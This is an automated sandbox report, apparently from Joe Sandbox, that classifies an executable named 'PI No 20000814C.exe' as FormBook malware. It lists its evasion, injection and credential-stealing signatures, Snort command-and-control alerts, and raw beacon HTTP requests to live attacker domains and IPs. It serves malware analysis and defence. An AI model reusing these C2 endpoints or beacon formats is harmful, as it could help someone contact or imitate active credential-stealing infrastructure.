Windows Analysis Report
PI No 20000814C.exe

Overview

General Information

Sample name: PI No 20000814C.exe
Analysis ID: 1446508
MD5: fddc263879fbf539b746d116e8429a7f
SHA1: d83296177c8f166a95cafbd12ac1ae327ded42c7
SHA256: 6803a04a376df6f873fe53b3b79bf12534b8c1b74d037a01f537e74bac994f88
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: PI No 20000814C.exe Virustotal: Detection: 41% Perma Link
Source: PI No 20000814C.exe ReversingLabs: Detection: 39%
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: PI No 20000814C.exe Joe Sandbox ML: detected
Source: PI No 20000814C.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4522417554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4520103554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: cipher.pdbGCTL source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cipher.pdb source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F64696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00F64696
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00F6C9C7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6C93C FindFirstFileW,FindClose, 0_2_00F6C93C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F6F200
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F6F35D
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F6F65E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F63A2B
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F63D4E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F6BF27
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032CBBC0 FindFirstFileW,FindNextFileW,FindClose, 4_2_032CBBC0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4x nop then xor eax, eax 4_2_032B9750

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49705 -> 69.57.162.24:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49706 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49707 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49711 -> 216.40.34.41:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49712 -> 216.40.34.41:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49714 -> 216.40.34.41:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49715 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49716 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49719 -> 104.21.28.203:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49720 -> 104.21.28.203:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49722 -> 104.21.28.203:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49723 -> 203.161.43.228:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49724 -> 203.161.43.228:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49726 -> 203.161.43.228:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49731 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49732 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49735 -> 185.253.212.22:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 185.253.212.22:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 185.253.212.22:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49739 -> 87.236.16.214:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49740 -> 87.236.16.214:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49742 -> 87.236.16.214:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49743 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49744 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49746 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49747 -> 194.58.112.174:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49748 -> 194.58.112.174:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49750 -> 194.58.112.174:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49751 -> 5.101.153.149:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49752 -> 5.101.153.149:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49754 -> 5.101.153.149:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49755 -> 92.118.24.161:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49756 -> 92.118.24.161:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49758 -> 92.118.24.161:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49759 -> 212.227.172.253:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49760 -> 212.227.172.253:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49762 -> 212.227.172.253:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49763 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49764 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49766 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49767 -> 69.57.162.24:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49768 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49769 -> 162.240.81.18:80
Source: DNS query: www.autonomyai.xyz
Source: Joe Sandbox View IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View IP Address: 69.57.162.24 69.57.162.24
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: BEGET-ASRU BEGET-ASRU
Source: Joe Sandbox View ASN Name: EZIT-ASHU EZIT-ASHU
Source: Joe Sandbox View ASN Name: FORTRESSITXUS FORTRESSITXUS
Source: Joe Sandbox View ASN Name: GREENER-ASPL GREENER-ASPL
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00F725E2
Source: global traffic HTTP traffic detected: GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /x98j/?FNPd=qjxZKFsELly6MM+AmuUyu+F9rQiXp5lDW0qCpVrbxnhhuort7QqFJtzXrMzOc4R6Q1I+kDBccd8ZIbwb2K8nQH4tZ93h2GRHyGwno8v69jYjSXEAvgOChTSVAihV0isdDVgpDYw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.upshercode.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.botcsllc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.darkerberrycoffee.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.featurasandals.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.anoldshow.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.badcopsinyourtown.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.autonomyai.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /xf32/?FNPd=C1mnXsnvmQ2srgCAP1LYR8UCiu5rr29LvVkLxlUVxlF6UozvjyxPjaNreXZ1i0YG7AgmeP0abVbXfNSSITNtMXyNs4HZedQg/L+kUEn9BLsW+ROjsB5HlVbKq/g7YxphTM4QsIM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.brzuszkiewicz.plAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.novosti-dubai.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.ilodezu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.kubanci.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= HTTP/1.1Host: www.dvizhenie-pallet.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.szandraromanovics.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
